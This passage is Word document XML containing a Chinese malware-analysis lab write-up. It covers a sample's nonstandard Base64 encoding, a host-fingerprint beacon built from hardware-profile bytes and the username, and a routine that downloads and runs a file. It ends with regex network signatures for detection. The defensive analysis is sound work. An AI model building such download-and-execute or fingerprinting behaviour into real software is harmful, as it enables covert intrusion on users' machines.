          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</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查看sub_401000</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162935" cy="3415030"/>
            <wp:effectExtent l="0" t="0" r="6985" b="1397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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3162935" cy="3415030"/>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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3158490" cy="1915160"/>
            <wp:effectExtent l="0" t="0" r="11430" b="508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2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3158490" cy="1915160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>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查看byte_4950C0，是标准base64编码字符串</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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2849880" cy="3347085"/>
            <wp:effectExtent l="0" t="0" r="0" b="571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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2849880" cy="3347085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4156710" cy="478155"/>
            <wp:effectExtent l="0" t="0" r="3810" b="952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4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4156710" cy="478155"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>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default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sub_401000并不是一个标准的Base64编码函数。当需要填充4字节对齐字符块的结束时，Bas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>64编码函数通常有个等号(=)的静态引用。很多实现中将有两个等号(=)的引用，因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>字节字符块的最后两个字符能被填充。</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sub_401000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>包含了对标准Base64编码字符串的引用：ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/。</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下图显示sub_401000的一个分叉。往左是选择编码字符，往右是选择填充字符。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>loc_40107A的61h是‘a’，不是“=”。</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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3988435" cy="1177925"/>
            <wp:effectExtent l="0" t="0" r="4445" b="1079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5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3988435" cy="1177925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3678555" cy="1869440"/>
            <wp:effectExtent l="0" t="0" r="9525" b="508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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3678555" cy="1869440"/>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在main函数内，靠近基本(外部)的Basc64编码函数调用之前，看到了GetCurrentHwProfileA函数、GetUserName函数、sprintf函数以及字符串</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>%c%c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>%c%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>c:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>%c%c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>%c%c:%c%c:%c%c和%s-%s。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>GetCurrentHwProfileA函数返回GUID中的6个字节以MAC地址格式(冒号之间每个字节的十六进制形式)被打印，并且成为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>%s-%s中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的第一个字符串，而第二个字符串则是用户名。</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格式中基本的字符串如下所示，用HH表示一个十六进制字节：</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HH:HH:HH:HH:HH:HH-username</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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通过Base64解码字符串NDE6NZM6N0U6Mjk60TM6NTYtSm9obiBTbwloaAaa,确认这个格式是正确的</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首次运行动态分析时看到过它，结果是41:73:7E:29:93:56- John</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Smith\x06\x9a。</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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3319780" cy="3328670"/>
            <wp:effectExtent l="0" t="0" r="2540" b="889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7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3319780" cy="3328670"/>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之前，恶意代码使用带有特殊填充字符串的标准Base64编码，这里填充字符是a。结果中John Smith之后的额外字符使用了标准的Base64解码器，它将字符串末尾aa解释为标准字符，而不是将其识别为可替换的填充字符。</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回到URLDownloadToCacheFileA函数(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sub_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4011A3,downloadNRun),看到函数的成功分支是命令CreateProcessA,它将URLDownloadToCacheFileA返回的路径名作为参数。一旦恶意代码下载了一个文件，它简单地执行该文件并退出。</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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3155950" cy="2995295"/>
            <wp:effectExtent l="0" t="0" r="13970" b="698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8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3155950" cy="2995295"/>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分析生成网络特征时，针对性的关键静态元素是用来填充的冒号，以及在硬件配置文件字节和用户名之间的破折号。然而，这些元素作为检测目标是具有挑战性的，因为在将这些内容发送到网络上之前，恶意代码应用了一层Base64编码。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>下表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>显示了如何转换这些字符以及目标模式。</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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3858895" cy="637540"/>
            <wp:effectExtent l="0" t="0" r="12065" b="254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9">
                      <a:lum bright="6000" contrast="6000"/>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3858895" cy="637540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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使用Base64编码时，因为原始字符串中的冒号是三字符组中的第三个字符，所以编码后每个四字符组中的第四个字符比特都来自于第三个字符，这也是冒号之后每四个字符为6的原因，因为破折号的使用，所以第六个四字符组总是以字符t结束。因此，我们知道该URI至少有24个字符，并且指定了四个字符6与字符t的具体位置。我们也知道可能用于表示其余URI的字符集，以及下载的名称是单个字符，而这字符与路径的末尾是相同的。</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现在，考虑两个正则表达式。如下是第一个正则表达式：</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pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/\/[A-Z0-9a-z+\/]{3}6[A-Z</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>-9a-z+\/]{3}6[A-Z0-9a-z+\/]{3}6[A-Z0-9a-z+\/]{3}6[A-Z0-9a-z+\/]{3}6[A-Z0-9a-z+\/]{3}t([A-Z0-9a-z+\/]{4}){1,}\//</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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这个表达式中主要的元素之一是[A-Z0-9a-z+\/]</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它匹配Base64编码中所有字符。为了更好地理解这个表达式，使用希腊字母欧米茄(Ω)来替换该元素：</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pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/\/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Ω</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>{3}6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Ω</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>{3}6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Ω</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>{3}6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Ω</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>{3}6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Ω</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>{3}6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Ω</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>{3}t(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Ω</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>{4}){1,}\//</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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接下来，扩展到多个字符： </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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/\/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>ΩΩΩ</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>ΩΩΩ</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>ΩΩΩ</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>ΩΩΩ</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>ΩΩΩ</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>ΩΩΩ</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>t(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>ΩΩΩΩ</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>){1,}\//</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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上述表达式更加清楚地展示出表达式中包含以字符6和字符t结尾的四字符组的模式。这个正则表达式将含有静态字符的URI第一部分作为目标。</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第二个正则表达式以至少25个字符的Base64表达式为目标。文件名是单字符后跟一个.png,这个字符与前面段的最后一个字符相同。下面是正则表达式：</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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
